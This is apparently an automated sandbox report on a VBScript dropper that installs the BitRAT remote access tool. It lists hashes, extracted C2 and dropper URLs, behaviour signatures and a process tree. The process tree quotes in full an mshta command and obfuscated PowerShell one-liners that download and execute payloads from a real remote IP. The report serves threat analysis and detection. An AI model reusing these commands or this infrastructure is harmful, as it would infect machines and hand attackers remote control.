AudioApplication.vbs

General
Target

AudioApplication.vbs

Filesize

3KB

Completed

19-01-2022 07:09

Score
10/10
MD5

257cb7d47ef7b5221bd8d95cbdd7f47e

SHA1

0f4cb975fbaf27684908503de9476a2d02646734

SHA256

b425d52cfdada3b73bdc0cb7bbcb57b72f2b2b95182dbc2d61fafecdcc6aa5f9

Malware Config

Extracted

Language hta
Source
URLs
hta.dropper

http://185.7.214.7/BITRA/oo.html

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/BITRA/AU.PNG

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/BITRA/YES.PNG

Extracted

Family bitrat
Version 1.38
C2

185.7.214.8:4884

Attributes
communication_password
311f4e4b7562e9d5ba31bd6afa686479
tor_process
tor
Signatures 11

Filter: none

Defense Evasion
Discovery
  • BitRAT

    Description

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Blocklisted process makes network request
    mshta.exepowershell.exepowershell.exe

    Reported IOCs

    flowpidprocess
    4516mshta.exe
    51992powershell.exe
    62020powershell.exe
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmpupx
    behavioral1/memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmpupx
    behavioral1/memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmpupx
    behavioral1/memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmpupx
    behavioral1/memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmpupx
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    RegSvcs.exe

    Reported IOCs

    pidprocess
    1768RegSvcs.exe
    1768RegSvcs.exe
    1768RegSvcs.exe
    1768RegSvcs.exe
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1992 set thread context of 17681992powershell.exeRegSvcs.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies Internet Explorer settings
    mshta.exe

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Mainmshta.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exepowershell.exe

    Reported IOCs

    pidprocess
    1992powershell.exe
    2020powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exepowershell.exeRegSvcs.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1992powershell.exe
    Token: SeDebugPrivilege2020powershell.exe
    Token: SeDebugPrivilege1768RegSvcs.exe
    Token: SeShutdownPrivilege1768RegSvcs.exe
  • Suspicious use of SetWindowsHookEx
    RegSvcs.exe

    Reported IOCs

    pidprocess
    1768RegSvcs.exe
    1768RegSvcs.exe
  • Suspicious use of WriteProcessMemory
    WScript.exemshta.exepowershell.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 524 wrote to memory of 516524WScript.exemshta.exe
    PID 524 wrote to memory of 516524WScript.exemshta.exe
    PID 524 wrote to memory of 516524WScript.exemshta.exe
    PID 516 wrote to memory of 2020516mshta.exepowershell.exe
    PID 516 wrote to memory of 2020516mshta.exepowershell.exe
    PID 516 wrote to memory of 2020516mshta.exepowershell.exe
    PID 516 wrote to memory of 1992516mshta.exepowershell.exe
    PID 516 wrote to memory of 1992516mshta.exepowershell.exe
    PID 516 wrote to memory of 1992516mshta.exepowershell.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
    PID 1992 wrote to memory of 17681992powershell.exeRegSvcs.exe
Processes 5
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"
    Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.html
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:2020
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/YES.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        Blocklisted process makes network request
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Suspicious use of NtSetInformationThreadHideFromDebugger
          Suspicious use of AdjustPrivilegeToken
          Suspicious use of SetWindowsHookEx
          PID:1768
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                        MD5

                        491e4953bc08a51d076eea36b52fe963

                        SHA1

                        cb05518529a74566781411bc61ba1c2415613c71

                        SHA256

                        19f295480e74354e858c88c4e78b4942ebe3095488a55dd1dee277f287bb5037

                        SHA512

                        a4a3ea21092a4780004db1db77e2a09bb2d2dfe5688ca2dfadf56be4ca44934c5b759ec09a03d9b44df7b4c6ec8508c877d8ae6bd1993e5216a5cdd26dce95b3

                      • memory/524-53-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp

                      • memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmp

                      • memory/1768-73-0x0000000075531000-0x0000000075533000-memory.dmp

                      • memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmp

                      • memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmp

                      • memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmp

                      • memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmp

                      • memory/1768-68-0x0000000000400000-0x00000000007E4000-memory.dmp

                      • memory/1768-75-0x0000000000401000-0x00000000007E4000-memory.dmp

                      • memory/1992-63-0x0000000002642000-0x0000000002644000-memory.dmp

                      • memory/1992-66-0x000000000264B000-0x000000000266A000-memory.dmp

                      • memory/1992-59-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp

                      • memory/1992-65-0x0000000002644000-0x0000000002647000-memory.dmp

                      • memory/1992-61-0x0000000002640000-0x0000000002642000-memory.dmp

                      • memory/2020-60-0x00000000025F0000-0x00000000026F2000-memory.dmp

                      • memory/2020-64-0x00000000026F4000-0x00000000026F7000-memory.dmp

                      • memory/2020-58-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp

                      • memory/2020-62-0x00000000026F2000-0x00000000026F4000-memory.dmp

                      • memory/2020-67-0x00000000026FB000-0x000000000271A000-memory.dmp